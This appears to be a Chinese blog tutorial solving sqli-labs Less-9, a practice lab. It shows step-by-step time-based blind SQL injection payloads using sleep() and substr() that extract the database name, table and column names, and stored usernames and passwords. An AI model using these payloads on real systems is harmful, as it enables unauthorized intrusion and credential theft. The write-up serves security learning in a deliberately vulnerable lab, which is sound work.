sqli-labs less9详解

【❤作者简介:研究生在读 IT女; 如果文章有错请指正,让我们一起学习,天天向上,一起进步! 如果对你有帮助,还请点赞收藏哦~❤】
在这里插入图片描述
【写在前面:建议:如果对SQL注入中SQL语句不熟悉的可以先看看SQL盲注-你需要知道的常用sql函数和语句 如果看懂了这篇,这题就当应用了】
1.判断闭合条件
2.猜数据名长度和名字
3.猜表名长度和名字
4.猜字段长度和名字
5.猜数值长度和名字

1.判断闭合条件

注入 ?id=1’ and sleep(5) 发现明显延迟5秒
在这里插入图片描述
而注入?id=1” and sleep(5) 未发现延迟
在这里插入图片描述
说明闭合是'而不是"

2.猜数据名长度和名字

注入?id=1' and sleep(if((length(database())>4),5,0)) --+ 显示延迟5秒,说明数据库名长大于4
在这里插入图片描述

注入?id=1' and sleep(if((length(database())<7),5,0)) --+ ,显示无延迟,这说明数据库名长>=7
在这里插入图片描述

注入

?id=1' and sleep(if((length(database())=8),5,0)) --+

显示延迟5秒,说明数据库名长度为8。
在这里插入图片描述
确定数据库名字

id=1' and if(ascii(substr(database(),1,1))>140,sleep(5),1) -- +

在这里插入图片描述

id=1' and if(ascii(substr(database(),1,1))>100,sleep(5),1) -- +

在这里插入图片描述

通过以上两张图可以确定数据库名第一个字符的ASCII值在110-140,然后利用二分法慢慢确定第一个字符的ASCII值为115(即‘s’)
输入

?id=1' and sleep(if((mid(database(),1,1)='s'),5,0)) --+  

验证一下
在这里插入图片描述
得到数据库名的第一个字母为‘s’,同理,可以利用ASCII码值进行二分法求得数据库名为‘security’。

3.猜表名长度和名字

输入:

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1)--+

在这里插入图片描述

延时5秒,得到表名第一位为‘e’

输入

?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,6)='emails',sleep(5),1)--+ 

在这里插入图片描述

,验证得到表名为‘emails’

同理,得到第二个数据表的第一位是 r,…依次类推,得到 referers … 再以此类推,我们可以得到所有的数据表 emails,referers,uagents,users。
当我们猜出第3个表叫‘users’,可以通过下面这句话验证一下:

?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,6)='users',sleep(5),1)--+ 

在这里插入图片描述

4.猜字段长度和名字

输入

?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),1)-- -

在这里插入图片描述

确定users表的第一个字段的第一位是‘i’

?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),2,1)='d',sleep(5),1)-- -

确定users表的第一个字段的第一位是‘d’
同理,求得字段分别为‘id’,‘username’,‘password’

?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),1,8)='password',sleep(5),1)-- -

在这里插入图片描述

确定users表的第三列是‘password’

5.猜数值长度和名字

确定数值

?id=1' and if(ascii(substr((select username from users limit 0,1), 1,1))=68,sleep(5),1)--+

在这里插入图片描述

确定users的第一列的第一个数值的第一位为‘D’(‘D’的ASCII码值为68),同理得到users的第一行的username为Dumb,password为 Dumb,第二行的username为 Angelina ,password为I-kill-you。
在这里插入图片描述

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值